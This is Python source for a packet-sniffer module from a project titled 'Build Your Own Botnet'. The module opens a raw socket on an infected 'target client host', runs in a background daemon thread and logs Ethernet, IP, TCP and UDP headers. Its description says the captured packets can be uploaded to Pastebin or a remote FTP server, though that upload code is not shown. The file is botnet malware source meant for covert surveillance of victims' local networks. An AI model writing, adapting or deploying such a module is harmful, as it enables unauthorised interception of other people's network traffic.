1
#!/usr/bin/python
2
# -*- coding: utf-8 -*-
3
'Packet Sniffer (Build Your Own Botnet)'
4

5
# standard libarary
6
import time
7
import struct
8
import socket
9
import binascii
10
import threading
11

12
try:
13
    from StringIO import StringIO  # Python 2
14
except ImportError:
15
    from io import StringIO        # Python 3
16

17
# utilities
18
import util
19

20
# globals
21
packages = []
22
platforms = ['linux2','darwin']
23
results = {}
24
log = StringIO()
25
flag = threading.Event()
26
usage  = 'packetsniffer [mode]'
27
desription = """
28
Capture packets on the target client host machine's local network
29
and optionally upload them to Pastebin or to a remote FTP server
30
"""
31

32
# main
33
def _udp_header(data):
34
    try:
35
        udp_hdr = struct.unpack('!4H', data[:8])
36
        src = udp_hdr[0]
37
        dst = udp_hdr[1]
38
        length = udp_hdr[2]
39
        chksum = udp_hdr[3]
40
        data = data[8:]
41
        globals()['log'].write('\n================== UDP HEADER ==================')
42
        globals()['log'].write('\n================================================')
43
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Source', src))
44
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Dest', dst))
45
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Length', length))
46
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Check Sum', chksum))
47
        globals()['log'].write('\n================================================')
48
        return data
49
    except Exception as e:
50
        globals()['log'].write("\nError in {} header: '{}'".format('UDP', str(e)))
51

52
def _tcp_header(recv_data):
53
    try:
54
        tcp_hdr = struct.unpack('!2H2I4H', recv_data[:20])
55
        src_port = tcp_hdr[0]
56
        dst_port = tcp_hdr[1]
57
        seq_num = tcp_hdr[2]
58
        ack_num = tcp_hdr[3]
59
        data_ofs = tcp_hdr[4] >> 12
60
        reserved = (tcp_hdr[4] >> 6) & 0x03ff
61
        flags = tcp_hdr[4] & 0x003f
62
        flagdata = {
63
            'URG' : bool(flags & 0x0020),
64
            'ACK' : bool(flags & 0x0010),
65
            'PSH' : bool(flags & 0x0008),
66
            'RST' : bool(flags & 0x0004),
67
            'SYN' : bool(flags & 0x0002),
68
            'FIN' : bool(flags & 0x0001)
69
        }
70
        win = tcp_hdr[5]
71
        chk_sum = tcp_hdr[6]
72
        urg_pnt = tcp_hdr[7]
73
        recv_data = recv_data[20:]
74
        globals()['log'].write('\n================== TCP HEADER ==================')
75
        globals()['log'].write('\n================================================')
76
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Source', src_port))
77
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Target', dst_port))
78
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Seq Num', seq_num))
79
        globals()['log'].write('\n{:>20} ,  {}\t\t'.format('Ack Num', ack_num))
80
        globals()['log'].write('\n{:>20} ,  {}\t\t'.format('Flags', ', '.join([flag for flag in flagdata if flagdata.get(flag)])))
81
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Window', win))
82
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Check Sum', chk_sum))
83
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Urg Pnt', urg_pnt))
84
        globals()['log'].write('\n================================================')
85
        return recv_data
86
    except Exception as e:
87
        globals()['log'].write("\nError in {} header: '{}'".format('TCP', str(e)))
88

89
def _ip_header(data):
90
    try:
91
        ip_hdr = struct.unpack('!6H4s4s', data[:20])
92
        ver = ip_hdr[0] >> 12
93
        ihl = (ip_hdr[0] >> 8) & 0x0f
94
        tos = ip_hdr[0] & 0x00ff
95
        tot_len = ip_hdr[1]
96
        ip_id = ip_hdr[2]
97
        flags = ip_hdr[3] >> 13
98
        fragofs = ip_hdr[3] & 0x1fff
99
        ttl = ip_hdr[4] >> 8
100
        ipproto = ip_hdr[4] & 0x00ff
101
        chksum = ip_hdr[5]
102
        src = socket.inet_ntoa(ip_hdr[6])
103
        dest = socket.inet_ntoa(ip_hdr[7])
104
        data = data[20:]
105
        globals()['log'].write('\n================== IP HEADER ===================')
106
        globals()['log'].write('\n================================================')
107
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('VER', ver))
108
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('IHL', ihl))
109
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('TOS', tos))
110
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Length', tot_len))
111
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('ID', ip_id))
112
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Flags', flags))
113
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Frag Offset', fragofs))
114
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('TTL', ttl))
115
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Next Protocol', ipproto))
116
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Check Sum', chksum))
117
        globals()['log'].write('\n{:>20} ,  {}\t\t'.format('Source IP', src))
118
        globals()['log'].write('\n{:>20} ,  {}\t\t'.format('Dest IP', dest))
119
        globals()['log'].write('\n================================================')
120
        return data, ipproto
121
    except Exception as e:
122
        globals()['log'].write("\nError in {} header: '{}'".format('IP', str(e)))
123

124

125
def _eth_header(data):
126
    try:
127
        ip_bool = False
128
        eth_hdr = struct.unpack('!6s6sH', data[:14])
129
        dst_mac = binascii.hexlify(eth_hdr[0])
130
        src_mac = binascii.hexlify(eth_hdr[1])
131
        proto = eth_hdr[2] >> 8
132
        globals()['log'].write('\n================================================')
133
        globals()['log'].write('\n================== ETH HEADER ==================')
134
        globals()['log'].write('\n================================================')
135
        globals()['log'].write('\n{:>20} ,  {}\t'.format('Target MAC', '{}:{}:{}:{}:{}:{}'.format(dst_mac[0:2],dst_mac[2:4],dst_mac[4:6],dst_mac[6:8],dst_mac[8:10],dst_mac[10:12])))
136
        globals()['log'].write('\n{:>20} ,  {}\t'.format('Source MAC', '{}:{}:{}:{}:{}:{}'.format(src_mac[0:2],src_mac[2:4],src_mac[4:6],src_mac[6:8],src_mac[8:10],src_mac[10:12])))
137
        globals()['log'].write('\n{:>20} ,  {}\t\t\t'.format('Protocol', proto))
138
        globals()['log'].write('\n================================================')
139
        if proto == 8:
140
            ip_bool = True
141
        data = data[14:]
142
        return data, ip_bool
143
    except Exception as e:
144
        globals()['log'].write("\nError in {} header: '{}'".format('ETH', str(e)))
145

146
def _run():
147
    global flag
148
    # try:
149
    sniffer_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
150
    while True:
151
#            flag.wait()
152
#            try:
153
        recv_data = sniffer_socket.recv(2048)
154
        recv_data, ip_bool = _eth_header(recv_data)
155
        if ip_bool:
156
            recv_data, ip_proto = _ip_header(recv_data)
157
            if ip_proto == 6:
158
                recv_data = _tcp_header(recv_data)
159
            elif ip_proto == 17:
160
                recv_data = _udp_header(recv_data)
161
#            except Exception as e:
162
#                util.log(str(e))
163
#                break
164
    try:
165
        sniffer_socket.close()
166
    except: pass
167
    # except Exception as e:
168
    #     util.log(str(e))
169

170

171
def run():
172
    """
173
    Monitor the host network and capture packets
174

175
    `Optional`
176
    :param int seconds:    duration in seconds (default: 30)
177

178
    """
179
    t = threading.Thread(target=_run, name=time.time())
180
    t.daemon = True
181
    t.start()
182
    return t
183

184